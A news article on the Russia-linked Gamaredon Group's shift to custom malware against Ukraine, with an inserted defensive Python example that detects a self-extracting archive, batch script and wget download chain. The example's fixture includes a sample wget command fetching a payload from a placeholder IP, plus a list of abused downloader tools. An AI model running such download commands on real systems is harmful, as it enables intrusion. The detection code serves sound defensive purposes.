An attack group with links to Russia has moved from off-the-shelf malware to a more customized approach focused on attacks against Ukraine, researchers said.
The Gamaredon Group has been active since at least mid-2013, but its activities were first detailed in April 2015 by LookingGlass, when it first looked at Operation Armageddon, said researchers at Palo Alto Networks.
Gamaredon has started using new, custom-built malware instead of the widely available RATs, said researchers at Palo Alto Networks.
The new pieces of malware used by the group are capable of downloading and executing additional payloads, scanning infected systems for specific files, capturing screenshots, and executing remote commands. While the older tools were easy to identify with antimalware products, the group's new creations often go undetected or unrecognized.
“We believe this is likely due to the modular nature of the malware, the malware’s heavy use of batch scripts, and the abuse of legitimate applications and tools (such as wget) for malicious purposes,” Palo Alto Networks researchers said in a blog post.
One of the custom backdoors used by Gamaredon is Pteranodon, which can capture screenshots, download and execute files, and execute commands on the system.
While Gamaredon has started using new malware, it still relies on self-extracting archives (SFX) and much of the same infrastructure as when its activities were first analyzed.
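As an added illustration from the defender's side (not code from the article or from the Palo Alto Networks post), the Python below walks constructed Sysmon-style process-creation records and flags the pattern described above: a self-extracting archive launching a batch script that in turn runs a legitimate download utility such as wget. The event fields, file paths and the 203.0.113.7 address are assumptions used only for the sample.

```python
import re

# Constructed Sysmon-style process-creation records (not real telemetry).
# pid 400 models the SFX -> batch script -> wget chain discussed in the text.
EVENTS = [
    {"pid": 100, "ppid": 1,   "image": r"C:\Windows\explorer.exe",
     "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Users\u\Downloads\report.exe",
     "cmd": "report.exe"},  # self-extracting archive opened by the user
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r'cmd.exe /c "C:\Users\u\AppData\Local\Temp\setup.bat"'},
    {"pid": 400, "ppid": 300, "image": r"C:\Users\u\AppData\Local\Temp\wget.exe",
     "cmd": "wget.exe http://203.0.113.7/u.bin -O u.bin"},  # assumed sample IP
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": "cmd.exe /c dir"},  # benign shell: no script, no download
]

# Legitimate utilities commonly abused as downloaders.
DOWNLOADERS = {"wget.exe", "curl.exe", "bitsadmin.exe", "certutil.exe"}
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads)\\", re.I)


def ancestry(pid, by_pid):
    """Follow ppid links upward; returns image basenames from root to pid."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        ev = by_pid[pid]
        chain.append(ev["image"].rsplit("\\", 1)[-1].lower())
        pid = ev["ppid"]
    return list(reversed(chain))


def batch_launched_downloaders(events):
    """Flag downloader utilities spawned by cmd.exe running a .bat/.cmd script."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for ev in events:
        name = ev["image"].rsplit("\\", 1)[-1].lower()
        if name not in DOWNLOADERS:
            continue
        parent = by_pid.get(ev["ppid"])
        if not parent or not parent["image"].lower().endswith("cmd.exe"):
            continue
        if not re.search(r"\.(bat|cmd)\b", parent["cmd"], re.I):
            continue
        hits.append({
            "pid": ev["pid"],
            "chain": " -> ".join(ancestry(ev["pid"], by_pid)),
            "user_writable": bool(USER_WRITABLE.search(ev["image"])),
        })
    return hits
```

The full ancestry string in each hit is what an analyst wants in the alert: a downloader is unremarkable on its own, but a downloader dropped in a temp directory and run by a batch script under an executable from the Downloads folder is the chain worth investigating.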
Russia-linked threat groups have been blamed for several campaigns targeting Ukraine, which remains a target of attacks and just sustained a cyber-induced outage in the country's energy sector.